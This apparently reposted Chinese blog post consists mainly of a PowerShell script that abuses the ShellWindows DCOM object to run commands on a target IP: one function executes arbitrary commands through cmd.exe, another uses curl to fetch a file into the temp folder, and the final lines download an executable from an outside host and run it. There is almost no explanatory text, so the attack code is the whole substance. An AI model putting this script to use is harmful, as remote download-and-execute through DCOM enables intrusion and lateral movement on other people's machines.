DCOM PowerShell 通过 DCOM 下载目标程序并且创建进程

function ExecDCOM($ip = "127.0.0.1", $cmd = "notepad.exe")
{
    $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',$ip);

    $obj = [System.Activator]::CreateInstance($com);

    $item = $obj.item();

    $ret = $item.Document.Application.ShellExecute("cmd.exe","/c " + $cmd,"c:\windows\system32",$null,0);

    return $ret;
}


function DownloadDCOM($ip = "127.0.0.1", $url = "notepad.exe", $dir = $env:temp)
{
    $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',$ip);

    $obj = [System.Activator]::CreateInstance($com);

    $item = $obj.item();

    $ret = $item.Document.Application.ShellExecute("curl","-O " + $url, $dir, $null, 0);

    return $ret;
}


DownloadDCOM "127.0.0.1" "http://sqlxss.com/spyxx.exe"

ExecDCOM "127.0.0.1" ($env:temp + "/spyxx.exe")

查看全文

相关阅读:
mongostat
mongodb的游标方法
 mongodb升级
 mongodb的白名单
 mongodb的副本集方法
 mongodb的collection方法
 mongodb的db方法
 mongoexport
mongoimport
mongodb分片集群管理

原文地址：https://www.cnblogs.com/suanguade/p/15661656.html